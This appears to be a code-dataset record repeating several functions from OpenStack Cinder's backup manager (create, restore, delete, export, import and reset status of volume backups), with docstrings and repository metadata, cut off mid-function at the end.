def create_backup(self, context, backup): volume_id = backup.volume_id snapshot_id = backup.snapshot_id volume = objects.Volume.get_by_id(context, volume_id) snapshot = (objects.Snapshot.get_by_id(context, snapshot_id) if snapshot_id else None) previous_status = volume.get('previous_status', None) updates = {} if snapshot_id: log_message = ('Create backup started, backup: %(backup_id)s volume: %(volume_id)s snapshot: %(snapshot_id)s.' % {'backup_id': backup.id, 'volume_id': volume_id, 'snapshot_id': snapshot_id}) else: log_message = ('Create backup started, backup: %(backup_id)s volume: %(volume_id)s.' % {'backup_id': backup.id, 'volume_id': volume_id}) LOG.info(log_message) self._notify_about_backup_usage(context, backup, 'create.start') backup.host = self.host backup.service = self.driver_name backup.availability_zone = self.az backup.save() expected_status = 'backing-up' if snapshot_id: actual_status = snapshot['status'] if (actual_status != expected_status): err = (_('Create backup aborted, expected snapshot status %(expected_status)s but got %(actual_status)s.') % {'expected_status': expected_status, 'actual_status': actual_status}) self._update_backup_error(backup, err) raise exception.InvalidSnapshot(reason=err) else: actual_status = volume['status'] if (actual_status != expected_status): err = (_('Create backup aborted, expected volume status %(expected_status)s but got %(actual_status)s.') % {'expected_status': expected_status, 'actual_status': actual_status}) self._update_backup_error(backup, err) raise exception.InvalidVolume(reason=err) expected_status = fields.BackupStatus.CREATING actual_status = backup.status if (actual_status != expected_status): err = (_('Create backup aborted, expected backup status %(expected_status)s but got %(actual_status)s.') % {'expected_status': expected_status, 'actual_status': actual_status}) self._update_backup_error(backup, err) raise exception.InvalidBackup(reason=err) try: if (not self.is_working()): err = _('Create backup aborted due to backup service is down') self._update_backup_error(backup, err) raise exception.InvalidBackup(reason=err) updates = self._run_backup(context, backup, volume) except Exception as err: with excutils.save_and_reraise_exception(): if snapshot_id: snapshot.status = fields.SnapshotStatus.AVAILABLE snapshot.save() else: self.db.volume_update(context, volume_id, {'status': previous_status, 'previous_status': 'error_backing-up'}) self._update_backup_error(backup, six.text_type(err)) if snapshot_id: self.db.snapshot_update(context, snapshot_id, {'status': fields.BackupStatus.AVAILABLE}) else: self.db.volume_update(context, volume_id, {'status': previous_status, 'previous_status': 'backing-up'}) backup.status = fields.BackupStatus.AVAILABLE backup.size = volume['size'] if updates: backup.update(updates) backup.save() if backup.parent_id: parent_backup = objects.Backup.get_by_id(context, backup.parent_id) parent_backup.num_dependent_backups += 1 parent_backup.save() LOG.info('Create backup finished. backup: %s.', backup.id) self._notify_about_backup_usage(context, backup, 'create.end')<|docstring|>Create volume backups using configured backup service.<|endoftext|>
fbe1f3c66f056c64251ae5712b818d69bd4ceb60e7b7b95908d503dfde412637
def restore_backup(self, context, backup, volume_id): 'Restore volume backups from configured backup service.' LOG.info('Restore backup started, backup: %(backup_id)s volume: %(volume_id)s.', {'backup_id': backup.id, 'volume_id': volume_id}) volume = objects.Volume.get_by_id(context, volume_id) self._notify_about_backup_usage(context, backup, 'restore.start') backup.host = self.host backup.save() expected_status = 'restoring-backup' actual_status = volume['status'] if (actual_status != expected_status): err = (_('Restore backup aborted, expected volume status %(expected_status)s but got %(actual_status)s.') % {'expected_status': expected_status, 'actual_status': actual_status}) backup.status = fields.BackupStatus.AVAILABLE backup.save() self.db.volume_update(context, volume_id, {'status': 'error_restoring'}) raise exception.InvalidVolume(reason=err) expected_status = fields.BackupStatus.RESTORING actual_status = backup['status'] if (actual_status != expected_status): err = (_('Restore backup aborted: expected backup status %(expected_status)s but got %(actual_status)s.') % {'expected_status': expected_status, 'actual_status': actual_status}) self._update_backup_error(backup, err) self.db.volume_update(context, volume_id, {'status': 'error'}) raise exception.InvalidBackup(reason=err) if (volume['size'] > backup['size']): LOG.info('Volume: %(vol_id)s, size: %(vol_size)d is larger than backup: %(backup_id)s, size: %(backup_size)d, continuing with restore.', {'vol_id': volume['id'], 'vol_size': volume['size'], 'backup_id': backup['id'], 'backup_size': backup['size']}) backup_service = self._map_service_to_driver(backup['service']) configured_service = self.driver_name if (backup_service not in configured_service): err = (_('Restore backup aborted, the backup service currently configured [%(configured_service)s] is not the backup service that was used to create this backup [%(backup_service)s].') % {'configured_service': configured_service, 'backup_service': backup_service}) backup.status = fields.BackupStatus.AVAILABLE backup.save() self.db.volume_update(context, volume_id, {'status': 'error'}) raise exception.InvalidBackup(reason=err) try: self._run_restore(context, backup, volume) except Exception: with excutils.save_and_reraise_exception(): self.db.volume_update(context, volume_id, {'status': 'error_restoring'}) backup.status = fields.BackupStatus.AVAILABLE backup.save() self.db.volume_update(context, volume_id, {'status': 'available'}) backup.status = fields.BackupStatus.AVAILABLE backup.save() LOG.info('Restore backup finished, backup %(backup_id)s restored to volume %(volume_id)s.', {'backup_id': backup.id, 'volume_id': volume_id}) self._notify_about_backup_usage(context, backup, 'restore.end')
Restore volume backups from configured backup service.
cinder/backup/manager.py
restore_backup
inspur-storage/cinder
1
python
def restore_backup(self, context, backup, volume_id): LOG.info('Restore backup started, backup: %(backup_id)s volume: %(volume_id)s.', {'backup_id': backup.id, 'volume_id': volume_id}) volume = objects.Volume.get_by_id(context, volume_id) self._notify_about_backup_usage(context, backup, 'restore.start') backup.host = self.host backup.save() expected_status = 'restoring-backup' actual_status = volume['status'] if (actual_status != expected_status): err = (_('Restore backup aborted, expected volume status %(expected_status)s but got %(actual_status)s.') % {'expected_status': expected_status, 'actual_status': actual_status}) backup.status = fields.BackupStatus.AVAILABLE backup.save() self.db.volume_update(context, volume_id, {'status': 'error_restoring'}) raise exception.InvalidVolume(reason=err) expected_status = fields.BackupStatus.RESTORING actual_status = backup['status'] if (actual_status != expected_status): err = (_('Restore backup aborted: expected backup status %(expected_status)s but got %(actual_status)s.') % {'expected_status': expected_status, 'actual_status': actual_status}) self._update_backup_error(backup, err) self.db.volume_update(context, volume_id, {'status': 'error'}) raise exception.InvalidBackup(reason=err) if (volume['size'] > backup['size']): LOG.info('Volume: %(vol_id)s, size: %(vol_size)d is larger than backup: %(backup_id)s, size: %(backup_size)d, continuing with restore.', {'vol_id': volume['id'], 'vol_size': volume['size'], 'backup_id': backup['id'], 'backup_size': backup['size']}) backup_service = self._map_service_to_driver(backup['service']) configured_service = self.driver_name if (backup_service not in configured_service): err = (_('Restore backup aborted, the backup service currently configured [%(configured_service)s] is not the backup service that was used to create this backup [%(backup_service)s].') % {'configured_service': configured_service, 'backup_service': backup_service}) backup.status = fields.BackupStatus.AVAILABLE backup.save() self.db.volume_update(context, volume_id, {'status': 'error'}) raise exception.InvalidBackup(reason=err) try: self._run_restore(context, backup, volume) except Exception: with excutils.save_and_reraise_exception(): self.db.volume_update(context, volume_id, {'status': 'error_restoring'}) backup.status = fields.BackupStatus.AVAILABLE backup.save() self.db.volume_update(context, volume_id, {'status': 'available'}) backup.status = fields.BackupStatus.AVAILABLE backup.save() LOG.info('Restore backup finished, backup %(backup_id)s restored to volume %(volume_id)s.', {'backup_id': backup.id, 'volume_id': volume_id}) self._notify_about_backup_usage(context, backup, 'restore.end')
def restore_backup(self, context, backup, volume_id): LOG.info('Restore backup started, backup: %(backup_id)s volume: %(volume_id)s.', {'backup_id': backup.id, 'volume_id': volume_id}) volume = objects.Volume.get_by_id(context, volume_id) self._notify_about_backup_usage(context, backup, 'restore.start') backup.host = self.host backup.save() expected_status = 'restoring-backup' actual_status = volume['status'] if (actual_status != expected_status): err = (_('Restore backup aborted, expected volume status %(expected_status)s but got %(actual_status)s.') % {'expected_status': expected_status, 'actual_status': actual_status}) backup.status = fields.BackupStatus.AVAILABLE backup.save() self.db.volume_update(context, volume_id, {'status': 'error_restoring'}) raise exception.InvalidVolume(reason=err) expected_status = fields.BackupStatus.RESTORING actual_status = backup['status'] if (actual_status != expected_status): err = (_('Restore backup aborted: expected backup status %(expected_status)s but got %(actual_status)s.') % {'expected_status': expected_status, 'actual_status': actual_status}) self._update_backup_error(backup, err) self.db.volume_update(context, volume_id, {'status': 'error'}) raise exception.InvalidBackup(reason=err) if (volume['size'] > backup['size']): LOG.info('Volume: %(vol_id)s, size: %(vol_size)d is larger than backup: %(backup_id)s, size: %(backup_size)d, continuing with restore.', {'vol_id': volume['id'], 'vol_size': volume['size'], 'backup_id': backup['id'], 'backup_size': backup['size']}) backup_service = self._map_service_to_driver(backup['service']) configured_service = self.driver_name if (backup_service not in configured_service): err = (_('Restore backup aborted, the backup service currently configured [%(configured_service)s] is not the backup service that was used to create this backup [%(backup_service)s].') % {'configured_service': configured_service, 'backup_service': backup_service}) backup.status = fields.BackupStatus.AVAILABLE backup.save() self.db.volume_update(context, volume_id, {'status': 'error'}) raise exception.InvalidBackup(reason=err) try: self._run_restore(context, backup, volume) except Exception: with excutils.save_and_reraise_exception(): self.db.volume_update(context, volume_id, {'status': 'error_restoring'}) backup.status = fields.BackupStatus.AVAILABLE backup.save() self.db.volume_update(context, volume_id, {'status': 'available'}) backup.status = fields.BackupStatus.AVAILABLE backup.save() LOG.info('Restore backup finished, backup %(backup_id)s restored to volume %(volume_id)s.', {'backup_id': backup.id, 'volume_id': volume_id}) self._notify_about_backup_usage(context, backup, 'restore.end')<|docstring|>Restore volume backups from configured backup service.<|endoftext|>
26a75c720374bbc9a8ffa74e37e1fe93f272a8b7071fedc95d114d5a50998a77
def delete_backup(self, context, backup): 'Delete volume backup from configured backup service.' LOG.info('Delete backup started, backup: %s.', backup.id) self._notify_about_backup_usage(context, backup, 'delete.start') backup.host = self.host backup.save() expected_status = fields.BackupStatus.DELETING actual_status = backup.status if (actual_status != expected_status): err = (_('Delete_backup aborted, expected backup status %(expected_status)s but got %(actual_status)s.') % {'expected_status': expected_status, 'actual_status': actual_status}) self._update_backup_error(backup, err) raise exception.InvalidBackup(reason=err) if (not self.is_working()): err = _('Delete backup is aborted due to backup service is down') status = fields.BackupStatus.ERROR_DELETING self._update_backup_error(backup, err, status) raise exception.InvalidBackup(reason=err) backup_service = self._map_service_to_driver(backup['service']) if (backup_service is not None): configured_service = self.driver_name if (backup_service not in configured_service): err = (_('Delete backup aborted, the backup service currently configured [%(configured_service)s] is not the backup service that was used to create this backup [%(backup_service)s].') % {'configured_service': configured_service, 'backup_service': backup_service}) self._update_backup_error(backup, err) raise exception.InvalidBackup(reason=err) try: backup_service = self.get_backup_driver(context) backup_service.delete_backup(backup) except Exception as err: with excutils.save_and_reraise_exception(): self._update_backup_error(backup, six.text_type(err)) try: reserve_opts = {'backups': (- 1), 'backup_gigabytes': (- backup.size)} reservations = QUOTAS.reserve(context, project_id=backup.project_id, **reserve_opts) except Exception: reservations = None LOG.exception('Failed to update usages deleting backup') if (backup.encryption_key_id is not None): volume_utils.delete_encryption_key(context, key_manager.API(CONF), backup.encryption_key_id) backup.encryption_key_id = None backup.save() backup.destroy() if backup.parent_id: parent_backup = objects.Backup.get_by_id(context, backup.parent_id) if parent_backup.has_dependent_backups: parent_backup.num_dependent_backups -= 1 parent_backup.save() if reservations: QUOTAS.commit(context, reservations, project_id=backup.project_id) LOG.info('Delete backup finished, backup %s deleted.', backup.id) self._notify_about_backup_usage(context, backup, 'delete.end')
Delete volume backup from configured backup service.
cinder/backup/manager.py
delete_backup
inspur-storage/cinder
1
python
def delete_backup(self, context, backup): LOG.info('Delete backup started, backup: %s.', backup.id) self._notify_about_backup_usage(context, backup, 'delete.start') backup.host = self.host backup.save() expected_status = fields.BackupStatus.DELETING actual_status = backup.status if (actual_status != expected_status): err = (_('Delete_backup aborted, expected backup status %(expected_status)s but got %(actual_status)s.') % {'expected_status': expected_status, 'actual_status': actual_status}) self._update_backup_error(backup, err) raise exception.InvalidBackup(reason=err) if (not self.is_working()): err = _('Delete backup is aborted due to backup service is down') status = fields.BackupStatus.ERROR_DELETING self._update_backup_error(backup, err, status) raise exception.InvalidBackup(reason=err) backup_service = self._map_service_to_driver(backup['service']) if (backup_service is not None): configured_service = self.driver_name if (backup_service not in configured_service): err = (_('Delete backup aborted, the backup service currently configured [%(configured_service)s] is not the backup service that was used to create this backup [%(backup_service)s].') % {'configured_service': configured_service, 'backup_service': backup_service}) self._update_backup_error(backup, err) raise exception.InvalidBackup(reason=err) try: backup_service = self.get_backup_driver(context) backup_service.delete_backup(backup) except Exception as err: with excutils.save_and_reraise_exception(): self._update_backup_error(backup, six.text_type(err)) try: reserve_opts = {'backups': (- 1), 'backup_gigabytes': (- backup.size)} reservations = QUOTAS.reserve(context, project_id=backup.project_id, **reserve_opts) except Exception: reservations = None LOG.exception('Failed to update usages deleting backup') if (backup.encryption_key_id is not None): volume_utils.delete_encryption_key(context, key_manager.API(CONF), backup.encryption_key_id) backup.encryption_key_id = None backup.save() backup.destroy() if backup.parent_id: parent_backup = objects.Backup.get_by_id(context, backup.parent_id) if parent_backup.has_dependent_backups: parent_backup.num_dependent_backups -= 1 parent_backup.save() if reservations: QUOTAS.commit(context, reservations, project_id=backup.project_id) LOG.info('Delete backup finished, backup %s deleted.', backup.id) self._notify_about_backup_usage(context, backup, 'delete.end')
def delete_backup(self, context, backup): LOG.info('Delete backup started, backup: %s.', backup.id) self._notify_about_backup_usage(context, backup, 'delete.start') backup.host = self.host backup.save() expected_status = fields.BackupStatus.DELETING actual_status = backup.status if (actual_status != expected_status): err = (_('Delete_backup aborted, expected backup status %(expected_status)s but got %(actual_status)s.') % {'expected_status': expected_status, 'actual_status': actual_status}) self._update_backup_error(backup, err) raise exception.InvalidBackup(reason=err) if (not self.is_working()): err = _('Delete backup is aborted due to backup service is down') status = fields.BackupStatus.ERROR_DELETING self._update_backup_error(backup, err, status) raise exception.InvalidBackup(reason=err) backup_service = self._map_service_to_driver(backup['service']) if (backup_service is not None): configured_service = self.driver_name if (backup_service not in configured_service): err = (_('Delete backup aborted, the backup service currently configured [%(configured_service)s] is not the backup service that was used to create this backup [%(backup_service)s].') % {'configured_service': configured_service, 'backup_service': backup_service}) self._update_backup_error(backup, err) raise exception.InvalidBackup(reason=err) try: backup_service = self.get_backup_driver(context) backup_service.delete_backup(backup) except Exception as err: with excutils.save_and_reraise_exception(): self._update_backup_error(backup, six.text_type(err)) try: reserve_opts = {'backups': (- 1), 'backup_gigabytes': (- backup.size)} reservations = QUOTAS.reserve(context, project_id=backup.project_id, **reserve_opts) except Exception: reservations = None LOG.exception('Failed to update usages deleting backup') if (backup.encryption_key_id is not None): volume_utils.delete_encryption_key(context, key_manager.API(CONF), backup.encryption_key_id) backup.encryption_key_id = None backup.save() backup.destroy() if backup.parent_id: parent_backup = objects.Backup.get_by_id(context, backup.parent_id) if parent_backup.has_dependent_backups: parent_backup.num_dependent_backups -= 1 parent_backup.save() if reservations: QUOTAS.commit(context, reservations, project_id=backup.project_id) LOG.info('Delete backup finished, backup %s deleted.', backup.id) self._notify_about_backup_usage(context, backup, 'delete.end')<|docstring|>Delete volume backup from configured backup service.<|endoftext|>
40ba5d49ef5db0d2f05c95ef65cf869e887fa6c7df36b7f7a5fff1a5055c60ff
def export_record(self, context, backup): "Export all volume backup metadata details to allow clean import.\n\n Export backup metadata so it could be re-imported into the database\n without any prerequisite in the backup database.\n\n :param context: running context\n :param backup: backup object to export\n :returns: backup_record - a description of how to import the backup\n :returns: contains 'backup_url' - how to import the backup, and\n :returns: 'backup_service' describing the needed driver.\n :raises InvalidBackup:\n " LOG.info('Export record started, backup: %s.', backup.id) expected_status = fields.BackupStatus.AVAILABLE actual_status = backup.status if (actual_status != expected_status): err = (_('Export backup aborted, expected backup status %(expected_status)s but got %(actual_status)s.') % {'expected_status': expected_status, 'actual_status': actual_status}) raise exception.InvalidBackup(reason=err) backup_record = {'backup_service': backup.service} backup_service = self._map_service_to_driver(backup.service) configured_service = self.driver_name if (backup_service not in configured_service): err = (_('Export record aborted, the backup service currently configured [%(configured_service)s] is not the backup service that was used to create this backup [%(backup_service)s].') % {'configured_service': configured_service, 'backup_service': backup_service}) raise exception.InvalidBackup(reason=err) try: backup_service = self.get_backup_driver(context) driver_info = backup_service.export_record(backup) backup_url = backup.encode_record(driver_info=driver_info) backup_record['backup_url'] = backup_url except Exception as err: msg = six.text_type(err) raise exception.InvalidBackup(reason=msg) LOG.info('Export record finished, backup %s exported.', backup.id) return backup_record
Export all volume backup metadata details to allow clean import. Export backup metadata so it could be re-imported into the database without any prerequisite in the backup database. :param context: running context :param backup: backup object to export :returns: backup_record - a description of how to import the backup :returns: contains 'backup_url' - how to import the backup, and :returns: 'backup_service' describing the needed driver. :raises InvalidBackup:
cinder/backup/manager.py
export_record
inspur-storage/cinder
1
python
def export_record(self, context, backup): "Export all volume backup metadata details to allow clean import.\n\n Export backup metadata so it could be re-imported into the database\n without any prerequisite in the backup database.\n\n :param context: running context\n :param backup: backup object to export\n :returns: backup_record - a description of how to import the backup\n :returns: contains 'backup_url' - how to import the backup, and\n :returns: 'backup_service' describing the needed driver.\n :raises InvalidBackup:\n " LOG.info('Export record started, backup: %s.', backup.id) expected_status = fields.BackupStatus.AVAILABLE actual_status = backup.status if (actual_status != expected_status): err = (_('Export backup aborted, expected backup status %(expected_status)s but got %(actual_status)s.') % {'expected_status': expected_status, 'actual_status': actual_status}) raise exception.InvalidBackup(reason=err) backup_record = {'backup_service': backup.service} backup_service = self._map_service_to_driver(backup.service) configured_service = self.driver_name if (backup_service not in configured_service): err = (_('Export record aborted, the backup service currently configured [%(configured_service)s] is not the backup service that was used to create this backup [%(backup_service)s].') % {'configured_service': configured_service, 'backup_service': backup_service}) raise exception.InvalidBackup(reason=err) try: backup_service = self.get_backup_driver(context) driver_info = backup_service.export_record(backup) backup_url = backup.encode_record(driver_info=driver_info) backup_record['backup_url'] = backup_url except Exception as err: msg = six.text_type(err) raise exception.InvalidBackup(reason=msg) LOG.info('Export record finished, backup %s exported.', backup.id) return backup_record
def export_record(self, context, backup): "Export all volume backup metadata details to allow clean import.\n\n Export backup metadata so it could be re-imported into the database\n without any prerequisite in the backup database.\n\n :param context: running context\n :param backup: backup object to export\n :returns: backup_record - a description of how to import the backup\n :returns: contains 'backup_url' - how to import the backup, and\n :returns: 'backup_service' describing the needed driver.\n :raises InvalidBackup:\n " LOG.info('Export record started, backup: %s.', backup.id) expected_status = fields.BackupStatus.AVAILABLE actual_status = backup.status if (actual_status != expected_status): err = (_('Export backup aborted, expected backup status %(expected_status)s but got %(actual_status)s.') % {'expected_status': expected_status, 'actual_status': actual_status}) raise exception.InvalidBackup(reason=err) backup_record = {'backup_service': backup.service} backup_service = self._map_service_to_driver(backup.service) configured_service = self.driver_name if (backup_service not in configured_service): err = (_('Export record aborted, the backup service currently configured [%(configured_service)s] is not the backup service that was used to create this backup [%(backup_service)s].') % {'configured_service': configured_service, 'backup_service': backup_service}) raise exception.InvalidBackup(reason=err) try: backup_service = self.get_backup_driver(context) driver_info = backup_service.export_record(backup) backup_url = backup.encode_record(driver_info=driver_info) backup_record['backup_url'] = backup_url except Exception as err: msg = six.text_type(err) raise exception.InvalidBackup(reason=msg) LOG.info('Export record finished, backup %s exported.', backup.id) return backup_record<|docstring|>Export all volume backup metadata details to allow clean import. Export backup metadata so it could be re-imported into the database without any prerequisite in the backup database. :param context: running context :param backup: backup object to export :returns: backup_record - a description of how to import the backup :returns: contains 'backup_url' - how to import the backup, and :returns: 'backup_service' describing the needed driver. :raises InvalidBackup:<|endoftext|>
72a2e54b8b2d0788daef130c6352eb70c5ede01dd371a3474e77fcb281cf8af0
def import_record(self, context, backup, backup_service, backup_url, backup_hosts): 'Import all volume backup metadata details to the backup db.\n\n :param context: running context\n :param backup: The new backup object for the import\n :param backup_service: The needed backup driver for import\n :param backup_url: An identifier string to locate the backup\n :param backup_hosts: Potential hosts to execute the import\n :raises InvalidBackup:\n :raises ServiceNotFound:\n ' LOG.info('Import record started, backup_url: %s.', backup_url) if (backup_service != self.driver_name): if (len(backup_hosts) > 0): first_host = backup_hosts.pop() self.backup_rpcapi.import_record(context, first_host, backup, backup_service, backup_url, backup_hosts) else: err = (_('Import record failed, cannot find backup service to perform the import. Request service %(service)s.') % {'service': backup_service}) self._update_backup_error(backup, err) raise exception.ServiceNotFound(service_id=backup_service) else: try: backup_options = backup.decode_record(backup_url) driver_options = backup_options.pop('driver_info', {}) backup_service = self.get_backup_driver(context) backup_service.import_record(backup, driver_options) except Exception as err: msg = six.text_type(err) self._update_backup_error(backup, msg) raise exception.InvalidBackup(reason=msg) required_import_options = {'display_name', 'display_description', 'container', 'size', 'service_metadata', 'object_count', 'id'} missing_opts = (required_import_options - set(backup_options)) if missing_opts: msg = (_('Driver successfully decoded imported backup data, but there are missing fields (%s).') % ', '.join(missing_opts)) self._update_backup_error(backup, msg) raise exception.InvalidBackup(reason=msg) backup_id = backup_options['id'] if (backup_id != backup.id): msg = (_('Trying to import backup metadata from id %(meta_id)s into backup %(id)s.') % {'meta_id': backup_id, 'id': backup.id}) self._update_backup_error(backup, msg) raise exception.InvalidBackup(reason=msg) backup_options['service'] = self.driver_name backup_options['availability_zone'] = self.az backup_options['host'] = self.host for key in ('name', 'user_id', 'project_id', 'deleted_at', 'deleted', 'fail_reason', 'status'): backup_options.pop(key, None) backup.update(backup_options) backup.save() try: if isinstance(backup_service, driver.BackupDriverWithVerify): backup_service.verify(backup.id) else: LOG.warning('Backup service %(service)s does not support verify. Backup id %(id)s is not verified. Skipping verify.', {'service': self.driver_name, 'id': backup.id}) except exception.InvalidBackup as err: with excutils.save_and_reraise_exception(): self._update_backup_error(backup, six.text_type(err)) backup.update({'status': fields.BackupStatus.AVAILABLE}) backup.save() LOG.info('Import record id %s metadata from driver finished.', backup.id)
Import all volume backup metadata details to the backup db. :param context: running context :param backup: The new backup object for the import :param backup_service: The needed backup driver for import :param backup_url: An identifier string to locate the backup :param backup_hosts: Potential hosts to execute the import :raises InvalidBackup: :raises ServiceNotFound:
cinder/backup/manager.py
import_record
inspur-storage/cinder
1
python
def import_record(self, context, backup, backup_service, backup_url, backup_hosts): 'Import all volume backup metadata details to the backup db.\n\n :param context: running context\n :param backup: The new backup object for the import\n :param backup_service: The needed backup driver for import\n :param backup_url: An identifier string to locate the backup\n :param backup_hosts: Potential hosts to execute the import\n :raises InvalidBackup:\n :raises ServiceNotFound:\n ' LOG.info('Import record started, backup_url: %s.', backup_url) if (backup_service != self.driver_name): if (len(backup_hosts) > 0): first_host = backup_hosts.pop() self.backup_rpcapi.import_record(context, first_host, backup, backup_service, backup_url, backup_hosts) else: err = (_('Import record failed, cannot find backup service to perform the import. Request service %(service)s.') % {'service': backup_service}) self._update_backup_error(backup, err) raise exception.ServiceNotFound(service_id=backup_service) else: try: backup_options = backup.decode_record(backup_url) driver_options = backup_options.pop('driver_info', {}) backup_service = self.get_backup_driver(context) backup_service.import_record(backup, driver_options) except Exception as err: msg = six.text_type(err) self._update_backup_error(backup, msg) raise exception.InvalidBackup(reason=msg) required_import_options = {'display_name', 'display_description', 'container', 'size', 'service_metadata', 'object_count', 'id'} missing_opts = (required_import_options - set(backup_options)) if missing_opts: msg = (_('Driver successfully decoded imported backup data, but there are missing fields (%s).') % ', '.join(missing_opts)) self._update_backup_error(backup, msg) raise exception.InvalidBackup(reason=msg) backup_id = backup_options['id'] if (backup_id != backup.id): msg = (_('Trying to import backup metadata from id %(meta_id)s into backup %(id)s.') % {'meta_id': backup_id, 'id': backup.id}) self._update_backup_error(backup, msg) raise exception.InvalidBackup(reason=msg) backup_options['service'] = self.driver_name backup_options['availability_zone'] = self.az backup_options['host'] = self.host for key in ('name', 'user_id', 'project_id', 'deleted_at', 'deleted', 'fail_reason', 'status'): backup_options.pop(key, None) backup.update(backup_options) backup.save() try: if isinstance(backup_service, driver.BackupDriverWithVerify): backup_service.verify(backup.id) else: LOG.warning('Backup service %(service)s does not support verify. Backup id %(id)s is not verified. Skipping verify.', {'service': self.driver_name, 'id': backup.id}) except exception.InvalidBackup as err: with excutils.save_and_reraise_exception(): self._update_backup_error(backup, six.text_type(err)) backup.update({'status': fields.BackupStatus.AVAILABLE}) backup.save() LOG.info('Import record id %s metadata from driver finished.', backup.id)
def import_record(self, context, backup, backup_service, backup_url, backup_hosts): 'Import all volume backup metadata details to the backup db.\n\n :param context: running context\n :param backup: The new backup object for the import\n :param backup_service: The needed backup driver for import\n :param backup_url: An identifier string to locate the backup\n :param backup_hosts: Potential hosts to execute the import\n :raises InvalidBackup:\n :raises ServiceNotFound:\n ' LOG.info('Import record started, backup_url: %s.', backup_url) if (backup_service != self.driver_name): if (len(backup_hosts) > 0): first_host = backup_hosts.pop() self.backup_rpcapi.import_record(context, first_host, backup, backup_service, backup_url, backup_hosts) else: err = (_('Import record failed, cannot find backup service to perform the import. Request service %(service)s.') % {'service': backup_service}) self._update_backup_error(backup, err) raise exception.ServiceNotFound(service_id=backup_service) else: try: backup_options = backup.decode_record(backup_url) driver_options = backup_options.pop('driver_info', {}) backup_service = self.get_backup_driver(context) backup_service.import_record(backup, driver_options) except Exception as err: msg = six.text_type(err) self._update_backup_error(backup, msg) raise exception.InvalidBackup(reason=msg) required_import_options = {'display_name', 'display_description', 'container', 'size', 'service_metadata', 'object_count', 'id'} missing_opts = (required_import_options - set(backup_options)) if missing_opts: msg = (_('Driver successfully decoded imported backup data, but there are missing fields (%s).') % ', '.join(missing_opts)) self._update_backup_error(backup, msg) raise exception.InvalidBackup(reason=msg) backup_id = backup_options['id'] if (backup_id != backup.id): msg = (_('Trying to import backup metadata from id %(meta_id)s into backup %(id)s.') % {'meta_id': backup_id, 'id': backup.id}) self._update_backup_error(backup, msg) raise exception.InvalidBackup(reason=msg) backup_options['service'] = self.driver_name backup_options['availability_zone'] = self.az backup_options['host'] = self.host for key in ('name', 'user_id', 'project_id', 'deleted_at', 'deleted', 'fail_reason', 'status'): backup_options.pop(key, None) backup.update(backup_options) backup.save() try: if isinstance(backup_service, driver.BackupDriverWithVerify): backup_service.verify(backup.id) else: LOG.warning('Backup service %(service)s does not support verify. Backup id %(id)s is not verified. Skipping verify.', {'service': self.driver_name, 'id': backup.id}) except exception.InvalidBackup as err: with excutils.save_and_reraise_exception(): self._update_backup_error(backup, six.text_type(err)) backup.update({'status': fields.BackupStatus.AVAILABLE}) backup.save() LOG.info('Import record id %s metadata from driver finished.', backup.id)<|docstring|>Import all volume backup metadata details to the backup db. :param context: running context :param backup: The new backup object for the import :param backup_service: The needed backup driver for import :param backup_url: An identifier string to locate the backup :param backup_hosts: Potential hosts to execute the import :raises InvalidBackup: :raises ServiceNotFound:<|endoftext|>
49015b7c2be4f807d72199b3faf7c623267381995e35dfb3a1f68a784e76842c
def reset_status(self, context, backup, status): 'Reset volume backup status.\n\n :param context: running context\n :param backup: The backup object for reset status operation\n :param status: The status to be set\n :raises InvalidBackup:\n :raises BackupVerifyUnsupportedDriver:\n :raises AttributeError:\n ' LOG.info('Reset backup status started, backup_id: %(backup_id)s, status: %(status)s.', {'backup_id': backup.id, 'status': status}) backup_service_name = self._map_service_to_driver(backup.service) LOG.info('Backup service: %s.', backup_service_name) if (backup_service_name is not None): configured_service = self.driver_name if (backup_service_name not in configured_service): err = (_('Reset backup status aborted, the backup service currently configured [%(configured_service)s] is not the backup service that was used to create this backup [%(backup_service)s].') % {'configured_service': configured_service, 'backup_service': backup_service_name}) raise exception.InvalidBackup(reason=err) try: if ((status == fields.BackupStatus.AVAILABLE) and (backup['status'] != fields.BackupStatus.RESTORING)): backup_service = self.get_backup_driver(context) if isinstance(backup_service, driver.BackupDriverWithVerify): backup_service.verify(backup.id) backup.status = status backup.save() else: msg = (_('Backup service %(configured_service)s does not support verify. Backup id %(id)s is not verified. Skipping verify.') % {'configured_service': self.driver_name, 'id': backup.id}) raise exception.BackupVerifyUnsupportedDriver(reason=msg) elif ((status == fields.BackupStatus.ERROR) or ((status == fields.BackupStatus.AVAILABLE) and (backup.status == fields.BackupStatus.RESTORING))): backup.status = status backup.save() except exception.InvalidBackup: with excutils.save_and_reraise_exception(): LOG.error('Backup id %s is not invalid. Skipping reset.', backup.id) except exception.BackupVerifyUnsupportedDriver: with excutils.save_and_reraise_exception(): LOG.error('Backup service %(configured_service)s does not support verify. Backup id %(id)s is not verified. Skipping verify.', {'configured_service': self.driver_name, 'id': backup.id}) except AttributeError: msg = (_('Backup service %(service)s does not support verify. Backup id %(id)s is not verified. Skipping reset.') % {'service': self.driver_name, 'id': backup.id}) LOG.error(msg) raise exception.BackupVerifyUnsupportedDriver(reason=msg) try: self._cleanup_temp_volumes_snapshots_for_one_backup(context, backup) except Exception: LOG.exception('Problem cleaning temp volumes and snapshots for backup %(bkup)s.', {'bkup': backup.id}) notifier_info = {'id': backup.id, 'update': {'status': status}} notifier = rpc.get_notifier('backupStatusUpdate') notifier.info(context, 'backups.reset_status.end', notifier_info)
Reset volume backup status. :param context: running context :param backup: The backup object for reset status operation :param status: The status to be set :raises InvalidBackup: :raises BackupVerifyUnsupportedDriver: :raises AttributeError:
cinder/backup/manager.py
reset_status
inspur-storage/cinder
1
python
def reset_status(self, context, backup, status): 'Reset volume backup status.\n\n :param context: running context\n :param backup: The backup object for reset status operation\n :param status: The status to be set\n :raises InvalidBackup:\n :raises BackupVerifyUnsupportedDriver:\n :raises AttributeError:\n ' LOG.info('Reset backup status started, backup_id: %(backup_id)s, status: %(status)s.', {'backup_id': backup.id, 'status': status}) backup_service_name = self._map_service_to_driver(backup.service) LOG.info('Backup service: %s.', backup_service_name) if (backup_service_name is not None): configured_service = self.driver_name if (backup_service_name not in configured_service): err = (_('Reset backup status aborted, the backup service currently configured [%(configured_service)s] is not the backup service that was used to create this backup [%(backup_service)s].') % {'configured_service': configured_service, 'backup_service': backup_service_name}) raise exception.InvalidBackup(reason=err) try: if ((status == fields.BackupStatus.AVAILABLE) and (backup['status'] != fields.BackupStatus.RESTORING)): backup_service = self.get_backup_driver(context) if isinstance(backup_service, driver.BackupDriverWithVerify): backup_service.verify(backup.id) backup.status = status backup.save() else: msg = (_('Backup service %(configured_service)s does not support verify. Backup id %(id)s is not 